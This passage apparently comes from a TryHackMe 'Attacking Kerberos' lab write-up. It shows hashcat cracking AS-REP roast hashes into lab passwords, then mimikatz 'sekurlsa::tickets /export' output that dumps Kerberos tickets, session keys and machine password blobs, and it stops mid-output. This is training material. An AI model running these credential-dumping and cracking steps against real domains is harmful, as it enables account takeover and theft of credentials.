5A7584E9A4FFE35EF082DE33C6D8CE5BCC86CD96BDA38D0AC00BD7147635FDCF2B47D97B47916F29 F193A56884E891818A60106DB73AD14A4E4CD15AE008EAA66DBB1743377375BBAA596DD6A3DD8C37 B913997C71BDF9E2399A29BCBC37913089CA9A70B2FAECA67C4566E4889CC0DB255C6A404ED272C7 A411CDCB190D6B3A1A85A0FD31F338FA87691F208F2D4584B2E42B687D0C45A2CDE058A6BF0A9063 A65C37D0244AFC2FD740A7ADA02C18FB723BCBBB8ACA2DE372057C7F3FA8E4F10E4F02F43ED9FE81 464ECCF49AF5C13E3DE4977DD03B67FDCCAB5E776611577C7C6870D9BA030B0579E33D0F11A
Cracking the hash using hashcat -m 18200 asrep_hash.txt Pass.txt
┌──(kali㉿kali)-[~/TryHackMe/AttackingKerberos/files] └─$ hashcat -m 18200 asrep_hash.txt Pass.txt hashcat (v6.2.6) starting /sys/class/hwmon/hwmon3/temp1_input: No such file or directory OpenCL API (OpenCL 3.0 PoCL 5.0+debian Linux, None+Asserts, RELOC, SPIR, LLVM 17.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project] ================================================================================================================================================== * Device #1: cpu-penryn-Intel(R) Core(TM) i5 CPU M 520 @ 2.40GHz, 1362/2788 MB (512 MB allocatable), 4MCU Minimum password length supported by kernel: 0 Maximum password length supported by kernel: 256 Hashes: 2 digests; 2 unique digests, 2 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Optimizers applied: * Zero-Byte * Not-Iterated ATTENTION! Pure (unoptimized) backend kernels selected. Pure kernels can crack longer passwords, but drastically reduce performance. If you want to switch to optimized kernels, append -O to your commandline. See the above message to find out about the exact limits. Watchdog: Temperature abort trigger set to 90c Host memory required for this attack: 0 MB Dictionary cache hit: * Filename..: Pass.txt * Passwords.: 1240 * Bytes.....: 9706 * Keyspace..: 1240 $krb5asrep$Admin2@CONTROLLER.local:22c8d3204932277c02c00688cfa7f102$40581617af6297022114344c38b90ed059e93b027b74f1cb2bd42e2d8cd9c252fef6f10f35505bc8f168360d7060e4ca5645ff35c716c662093790a70254423fafa33c8044143fd780ce8eabf4f0735f794f65a9f33a7428b8f2b17b59774ca6b31ad0f30f100d8cc7121002fdae867cda41b0511b839fe1fee6af85b9d4c3cdf8083ffdb7bb8f85ae59cdde97ce47e529d1ce26512acca4a7732167d32b5d5d5d8b5927bd3f75dc8a6ec0ce16a562fde7cef62cc35345020fdb4fe73ed275d97ac1f15dc4f433857c40863e8652c087eb81ed6f06ee74ec6b8600ce8275ab7557e425efc790b36fe3ada76d58cf7a67d5f25470:P@$$W0rd2 $krb5asrep$User3@CONTROLLER.local:487fb02eec5b3276bbb1b68c2fff00f9$b7d0139ca807d5a7584e9a4ffe35ef082de33c6d8ce5bcc86cd96bda38d0ac00bd7147635fdcf2b47d97b47916f29f193a56884e891818a60106db73ad14a4e4cd15ae008eaa66dbb1743377375bbaa596dd6a3dd8c37b913997c71bdf9e2399a29bcbc37913089ca9a70b2faeca67c4566e4889cc0db255c6a404ed272c7a411cdcb190d6b3a1a85a0fd31f338fa87691f208f2d4584b2e42b687d0c45a2cde058a6bf0a9063a65c37d0244afc2fd740a7ada02c18fb723bcbbb8aca2de372057c7f3fa8e4f10e4f02f43ed9fe81464eccf49af5c13e3de4977dd03b67fdccab5e776611577c7c6870d9ba030b0579e33d0f11a:Password3 Session..........: hashcat Status...........: Cracked Hash.Mode........: 18200 (Kerberos 5, etype 23, AS-REP) Hash.Target......: asrep_hash.txt Time.Started.....: Tue Jun 25 09:15:17 2024 (0 secs) Time.Estimated...: Tue Jun 25 09:15:17 2024 (0 secs) Kernel.Feature...: Pure Kernel Guess.Base.......: File (Pass.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 586.7 kH/s (1.14ms) @ Accel:256 Loops:1 Thr:1 Vec:4 Recovered........: 2/2 (100.00%) Digests (total), 2/2 (100.00%) Digests (new), 2/2 (100.00%) Salts Progress.........: 2048/2480 (82.58%) Rejected.........: 0/2048 (0.00%) Restore.Point....: 0/1240 (0.00%) Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: 123456 -> moomoo Hardware.Mon.#1..: Util: 32% Started: Tue Jun 25 09:14:20 2024 Stopped: Tue Jun 25 09:15:20 2024
Got Credential
Admin2:P@$$W0rd2 User3:Password3
Kerberos 5 AS-REP etype 23
User3
Password3
Admin2
P@$$W0rd2
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe .#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59 .## ^ ##. "A La Vie, A L'Amour" - (oe.eo) ## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com ) ## \ / ## > http://blog.gentilkiwi.com/mimikatz '## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com ) '#####' > http://pingcastle.com / http://mysmartlogon.com ***/ mimikatz # privilege::debug Privilege '20' OK mimikatz # sekurlsa::tickets /export Authentication Id : 0 ; 399778 (00000000:000619a2) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:12:23 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 5648e0750373f1ea354b5b8d774adab4491813e74dd8ede4777dd4868860867c Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;619a2]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 399569 (00000000:000618d1) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:12:23 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 5648e0750373f1ea354b5b8d774adab4491813e74dd8ede4777dd4868860867c Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;618d1]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 190740 (00000000:0002e914) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:07:40 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; Session Key : 0x00000012 - aes256_hmac d108b2938441d1235d46c6c2afedad02e7ade986a010aba29af4bb56c357a45d Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;2e914]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi ! Authentication Id : 0 ; 60350 (00000000:0000ebbe) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 6/24/2024 6:07:04 PM SID : S-1-5-90-0-1 * Username : CONTROLLER-1$ * Domain : CONTROLLER.local * Password : fe 09 4c 08 0b cb e9 93 22 f0 ac d0 03 6d 7a be dd 10 c4 32 a0 f9 14 72 e7 25 44 a7 23 39 a4 68 3b 82 9e 60 ef d4 d3 5a 8a 21 90 fe 71 14 bb 16 cf 47 f1 d7 9b 3d e5 e3 da cf 67 7e 9b 36 32 75 87 57 1b fc 8e e9 4e f6 30 3d 88 24 6e 4f 15 b9 f8 26 d3 d0 83 c0 67 1c b4 59 2e d6 bd 13 07 60 5e 07 e7 ea 6e cd 77 da 97 f6 69 ea 4c 6e 75 e7 25 04 a5 d2 1d 6e 8b d2 90 4e a1 1d 63 1d 02 22 42 a9 07 0b 1b bb f1 dc 6e 14 ed ab fa e4 3b 90 41 0b 87 bb a2 4d 27 77 7a b0 b2 22 c8 de 48 64 fd 21 2e da df 68 cc e0 3a 04 67 8a 11 a2 f8 f4 b0 b0 d1 e3 51 04 f1 fe da c9 f6 85 eb f4 25 a3 52 2a 00 e8 25 d3 9a 08 31 27 86 cd b3 fe 6e 40 f6 ed 59 03 fe b1 3a 98 bf f7 d5 6c 74 3e de 5d fb 15 f4 08 c9 2b fd 0f c7 e7 6a 79 38 2c 93 4b Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 996 (00000000:000003e4) Session : Service from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:07:01 PM SID : S-1-5-20 * Username : controller-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service [00000000] Start/End/MaxRenew: 6/24/2024 6:37:07 PM ; 6/25/2024 4:37:07 AM ; 7/1/2024 6:37:07 PM Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL ) Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac a4b5331ccf96718cfba55cffd31f003c6be36c0e89217e12da4842a977e40635 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;3e4]-0-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 6/24/2024 6:37:07 PM ; 6/25/2024 4:37:07 AM ; 7/1/2024 6:37:07 PM Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Target Name (02) : krbtgt ; CONTROLLER.local ; @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL ( CONTROLLER.local ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 1b2b79c96e05c8031c8c3645fa6008dc9b07c674a7b2df3b7f6eddf683c255f3 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi ! Authentication Id : 0 ; 32762 (00000000:00007ffa) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) Logon Time : 6/24/2024 6:07:00 PM SID : S-1-5-96-0-0 * Username : CONTROLLER-1$ * Domain : CONTROLLER.local * Password : 4f 86 7b 98 4a 5c 2c 96 e2 ce 1f 48 6f a1 cb 7d 3c b4 6a e0 72 c3 81 60 63 90 41 1e e1 8b fd a8 ff c3 f1 7f 84 d0 21 35 52 fd 4a 17 07 36 a6 ba 16 3d 24 6b 60 4a e3 c4 b9 e6 38 ff 8a ee 0d 07 01 a5 bc 36 63 04 bc 38 5c ea 62 95 26 cc 3f c4 09 ab 0c 7f 41 08 ed e1 46 8d b2 8d 1d a9 ca 77 d6 c0 17 f6 38 38 59 66 73 9e cf 7f 96 b1 87 a1 8e 86 f8 b8 7d 84 e8 58 f3 cf 9c 96 90 a7 fd f5 73 18 62 8e 36 86 d3 18 b5 06 36 68 5a 55 17 34 ac 7b 68 02 dd 99 83 f8 a9 d2 20 83 19 93 d6 79 bd 1e 3b c3 ac 79 c5 ff cc a5 49 58 ac 62 e5 22 8a 75 68 95 14 b2 a5 de 75 25 2b 7a 31 8e 89 17 ad b0 93 07 44 43 4f ff 5a 4f f1 90 81 a3 4c 0f 9d 0c 89 3c 86 b2 0c 3d 61 3f d2 d8 09 1b 6a 9f af ed 9f f3 4b 66 0c 1b af 71 15 bc f6 a7 37 41 Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 2679241 (00000000:0028e1c9) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:38:40 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; 7/1/2024 6:07:40 PM Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 60a10000 : name_canonicalize ; pre_authent ; renewable ; forwarded ; forwardable ; Session Key : 0x00000012 - aes256_hmac d108b2938441d1235d46c6c2afedad02e7ade986a010aba29af4bb56c357a45d Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;28e1c9]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi ! Authentication Id : 0 ; 2081540 (00000000:001fc304) Session : NetworkCleartext from 0 User Name : Administrator Domain : CONTROLLER Logon Server : CONTROLLER-1 Logon Time : 6/24/2024 6:35:46 PM SID : S-1-5-21-432953485-3795405108-1502158860-500 * Username : Administrator * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service [00000000] Start/End/MaxRenew: 6/24/2024 6:52:43 PM ; 6/25/2024 4:35:46 AM ; 7/1/2024 6:35:46 PM Service Name (02) : CONTROLLER-1 ; HTTPService.CONTROLLER.local:30222 ; @ CONTROLLER.LOCAL Target Name (02) : CONTROLLER-1 ; HTTPService.CONTROLLER.local:30222 ; @ CONTROLLER.LOCAL Client Name (01) : Administrator ; @ CONTROLLER.LOCAL Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 36135430b4a31cea88be2ef1bd077203 Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 2 [...] * Saved to file [0;1fc304]-0-0-40a10000-Administrator@CONTROLLER-1-HTTPService.CONTROLLER.local~30222.kirbi ! [00000001] Start/End/MaxRenew: 6/24/2024 6:52:43 PM ; 6/25/2024 4:35:46 AM ; 7/1/2024 6:35:46 PM Service Name (02) : CONTROLLER-1 ; SQLService.CONTROLLER.local:30111 ; @ CONTROLLER.LOCAL Target Name (02) : CONTROLLER-1 ; SQLService.CONTROLLER.local:30111 ; @ CONTROLLER.LOCAL Client Name (01) : Administrator ; @ CONTROLLER.LOCAL Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000017 - rc4_hmac_nt 9bf96dd0ca40ef8fe04cd6ea31860154 Ticket : 0x00000017 - rc4_hmac_nt ; kvno = 2 [...] * Saved to file [0;1fc304]-0-1-40a10000-Administrator@CONTROLLER-1-SQLService.CONTROLLER.local~30111.kirbi ! Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket [00000000] Start/End/MaxRenew: 6/24/2024 6:35:46 PM ; 6/25/2024 4:35:46 AM ; 7/1/2024 6:35:46 PM Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Target Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL Client Name (01) : Administrator ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL ) Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac a56c7393882a0ea3087fb0a505562f9588fddde5acaa564304605aa88a2e1d11 Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...] * Saved to file [0;1fc304]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi ! Authentication Id : 0 ; 2080254 (00000000:001fbdfe) Session : Service from 0 User Name : sshd_564 Domain : VIRTUAL USERS Logon Server : (null) Logon Time : 6/24/2024 6:35:40 PM SID : S-1-5-111-3847866527-469524349-687026318-516638107-1125189541-564 * Username : CONTROLLER-1$ * Domain : CONTROLLER.local * Password : 4f 86 7b 98 4a 5c 2c 96 e2 ce 1f 48 6f a1 cb 7d 3c b4 6a e0 72 c3 81 60 63 90 41 1e e1 8b fd a8 ff c3 f1 7f 84 d0 21 35 52 fd 4a 17 07 36 a6 ba 16 3d 24 6b 60 4a e3 c4 b9 e6 38 ff 8a ee 0d 07 01 a5 bc 36 63 04 bc 38 5c ea 62 95 26 cc 3f c4 09 ab 0c 7f 41 08 ed e1 46 8d b2 8d 1d a9 ca 77 d6 c0 17 f6 38 38 59 66 73 9e cf 7f 96 b1 87 a1 8e 86 f8 b8 7d 84 e8 58 f3 cf 9c 96 90 a7 fd f5 73 18 62 8e 36 86 d3 18 b5 06 36 68 5a 55 17 34 ac 7b 68 02 dd 99 83 f8 a9 d2 20 83 19 93 d6 79 bd 1e 3b c3 ac 79 c5 ff cc a5 49 58 ac 62 e5 22 8a 75 68 95 14 b2 a5 de 75 25 2b 7a 31 8e 89 17 ad b0 93 07 44 43 4f ff 5a 4f f1 90 81 a3 4c 0f 9d 0c 89 3c 86 b2 0c 3d 61 3f d2 d8 09 1b 6a 9f af ed 9f f3 4b 66 0c 1b af 71 15 bc f6 a7 37 41 Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 1673170 (00000000:001987d2) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:22:11 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 6/24/2024 6:22:11 PM ; 6/25/2024 4:07:40 AM ; Service Name (02) : GC ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 1a98c1d99fafd84d4ae973080ab390ddbca0f736b863ff10b89730c41bbd4965 Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;1987d2]-1-0-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 399721 (00000000:00061969) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:12:23 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 6/24/2024 6:07:48 PM ; 6/25/2024 4:07:40 AM ; Service Name (02) : LDAP ; CONTROLLER-1.CONTROLLER.local ; CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac b553572d06114d99d160629e28c377b007e1d8a5ab8b7cdb05aae60361eeacfe Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;61969]-1-0-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 399661 (00000000:0006192d) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:12:23 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 5648e0750373f1ea354b5b8d774adab4491813e74dd8ede4777dd4868860867c Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;6192d]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 190152 (00000000:0002e6c8) Session : Network from 0 User Name : CONTROLLER-1$ Domain : CONTROLLER Logon Server : (null) Logon Time : 6/24/2024 6:07:40 PM SID : S-1-5-18 * Username : CONTROLLER-1$ * Domain : CONTROLLER.LOCAL * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? [00000000] Start/End/MaxRenew: 6/24/2024 6:07:40 PM ; 6/25/2024 4:07:40 AM ; Service Name (02) : ldap ; CONTROLLER-1.CONTROLLER.local ; @ CONTROLLER.LOCAL Target Name (--) : @ CONTROLLER.LOCAL Client Name (01) : CONTROLLER-1$ ; @ CONTROLLER.LOCAL Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ; Session Key : 0x00000012 - aes256_hmac 5648e0750373f1ea354b5b8d774adab4491813e74dd8ede4777dd4868860867c Ticket : 0x00000012 - aes256_hmac ; kvno = 5 [...] * Saved to file [0;2e6c8]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi ! Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 997 (00000000:000003e5) Session : Service from 0 User Name : LOCAL SERVICE Domain : NT AUTHORITY Logon Server : (null) Logon Time : 6/24/2024 6:07:04 PM SID : S-1-5-19 * Username : (null) * Domain : (null) * Password : (null) Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 60331 (00000000:0000ebab) Session : Interactive from 1 User Name : DWM-1 Domain : Window Manager Logon Server : (null) Logon Time : 6/24/2024 6:07:04 PM SID : S-1-5-90-0-1 * Username : CONTROLLER-1$ * Domain : CONTROLLER.local * Password : 4f 86 7b 98 4a 5c 2c 96 e2 ce 1f 48 6f a1 cb 7d 3c b4 6a e0 72 c3 81 60 63 90 41 1e e1 8b fd a8 ff c3 f1 7f 84 d0 21 35 52 fd 4a 17 07 36 a6 ba 16 3d 24 6b 60 4a e3 c4 b9 e6 38 ff 8a ee 0d 07 01 a5 bc 36 63 04 bc 38 5c ea 62 95 26 cc 3f c4 09 ab 0c 7f 41 08 ed e1 46 8d b2 8d 1d a9 ca 77 d6 c0 17 f6 38 38 59 66 73 9e cf 7f 96 b1 87 a1 8e 86 f8 b8 7d 84 e8 58 f3 cf 9c 96 90 a7 fd f5 73 18 62 8e 36 86 d3 18 b5 06 36 68 5a 55 17 34 ac 7b 68 02 dd 99 83 f8 a9 d2 20 83 19 93 d6 79 bd 1e 3b c3 ac 79 c5 ff cc a5 49 58 ac 62 e5 22 8a 75 68 95 14 b2 a5 de 75 25 2b 7a 31 8e 89 17 ad b0 93 07 44 43 4f ff 5a 4f f1 90 81 a3 4c 0f 9d 0c 89 3c 86 b2 0c 3d 61 3f d2 d8 09 1b 6a 9f af ed 9f f3 4b 66 0c 1b af 71 15 bc f6 a7 37 41 Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 32920 (00000000:00008098) Session : Interactive from 0 User Name : UMFD-0 Domain : Font Driver Host Logon Server : (null) Logon Time : 6/24/2024 6:07:00 PM SID : S-1-5-96-0-0 * Username : CONTROLLER-1$ * Domain : CONTROLLER.local * Password : fe 09 4c 08 0b cb e9 93 22 f0 ac d0 03 6d 7a be dd 10 c4 32 a0 f9 14 72 e7 25 44 a7 23 39 a4 68 3b 82 9e 60 ef d4 d3 5a 8a 21 90 fe 71 14 bb 16 cf 47 f1 d7 9b 3d e5 e3 da cf 67 7e 9b 36 32 75 87 57 1b fc 8e e9 4e f6 30 3d 88 24 6e 4f 15 b9 f8 26 d3 d0 83 c0 67 1c b4 59 2e d6 bd 13 07 60 5e 07 e7 ea 6e cd 77 da 97 f6 69 ea 4c 6e 75 e7 25 04 a5 d2 1d 6e 8b d2 90 4e a1 1d 63 1d 02 22 42 a9 07 0b 1b bb f1 dc 6e 14 ed ab fa e4 3b 90 41 0b 87 bb a2 4d 27 77 7a b0 b2 22 c8 de 48 64 fd 21 2e da df 68 cc e0 3a 04 67 8a 11 a2 f8 f4 b0 b0 d1 e3 51 04 f1 fe da c9 f6 85 eb f4 25 a3 52 2a 00 e8 25 d3 9a 08 31 27 86 cd b3 fe 6e 40 f6 ed 59 03 fe b1 3a 98 bf f7 d5 6c 74 3e de 5d fb 15 f4 08 c9 2b fd 0f c7 e7 6a 79 38 2c 93 4b Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 32864 (00000000:00008060) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) Logon Time : 6/24/2024 6:07:00 PM SID : S-1-5-96-0-1 * Username : CONTROLLER-1$ * Domain : CONTROLLER.local * Password : fe 09 4c 08 0b cb e9 93 22 f0 ac d0 03 6d 7a be dd 10 c4 32 a0 f9 14 72 e7 25 44 a7 23 39 a4 68 3b 82 9e 60 ef d4 d3 5a 8a 21 90 fe 71 14 bb 16 cf 47 f1 d7 9b 3d e5 e3 da cf 67 7e 9b 36 32 75 87 57 1b fc 8e e9 4e f6 30 3d 88 24 6e 4f 15 b9 f8 26 d3 d0 83 c0 67 1c b4 59 2e d6 bd 13 07 60 5e 07 e7 ea 6e cd 77 da 97 f6 69 ea 4c 6e 75 e7 25 04 a5 d2 1d 6e 8b d2 90 4e a1 1d 63 1d 02 22 42 a9 07 0b 1b bb f1 dc 6e 14 ed ab fa e4 3b 90 41 0b 87 bb a2 4d 27 77 7a b0 b2 22 c8 de 48 64 fd 21 2e da df 68 cc e0 3a 04 67 8a 11 a2 f8 f4 b0 b0 d1 e3 51 04 f1 fe da c9 f6 85 eb f4 25 a3 52 2a 00 e8 25 d3 9a 08 31 27 86 cd b3 fe 6e 40 f6 ed 59 03 fe b1 3a 98 bf f7 d5 6c 74 3e de 5d fb 15 f4 08 c9 2b fd 0f c7 e7 6a 79 38 2c 93 4b Group 0 - Ticket Granting Service Group 1 - Client Ticket ? Group 2 - Ticket Granting Ticket Authentication Id : 0 ; 32749 (00000000:00007fed) Session : Interactive from 1 User Name : UMFD-1 Domain : Font Driver Host Logon Server : (null) Logon Time : 6/24/2024 6:07:00 PM SID : S-1-5-96-0-1 * Username : CONTROLLER-1$ * Domain : CONTROLLER.local * Password : 4f 86 7b 98 4a 5c 2c 96 e2 ce 1f 48 6f a1 cb 7d 3c b4 6a e0 72 c3 81 60 63 90 41 1e e1 8b fd a8 ff c3 f1 7f 84 d0 21 35 52 fd 4a 17 07 36 a6 ba 16 3d 24 6b 60 4a e3 c4 b9 e6 38 ff 8a ee 0d 07 01 a5 bc 36 63 04 bc 38 5c ea 62 95 26 cc 3f c4 09 ab 0c 7f 41 08 ed e1 46 8d b2 8d 1d a9 ca 77 d6 c0 17 f6 38 38 59 66 73 9e cf 7f 96 b1 87 a1 8e 86 f8 b8 7d 84 e8 58 f3 cf 9c 96 90 a7 fd f5 73 18 62 8e 36 86 d3 18 b5 06 36 68 5a 55 17 34 ac 7b 68 02 dd 99 83 f8 a9 d2 20 83 19 93 d6 79 bd 1e 3b c3 ac 79 c5 ff cc a5 49 58 ac 62 e5 22 8a 75 68 95 14 b2 a5 de 75 25 2b 7a 31 8e 89 17 ad b0 93 07 44 43 4f ff 5a 4f f1 90 81 a3 4c 0f 9d 0c 89 3c 86 b2 0c 3d 61 3f d2 d8 09 1b 6a 9f af ed 9f f3 4b 66 0c 1b af 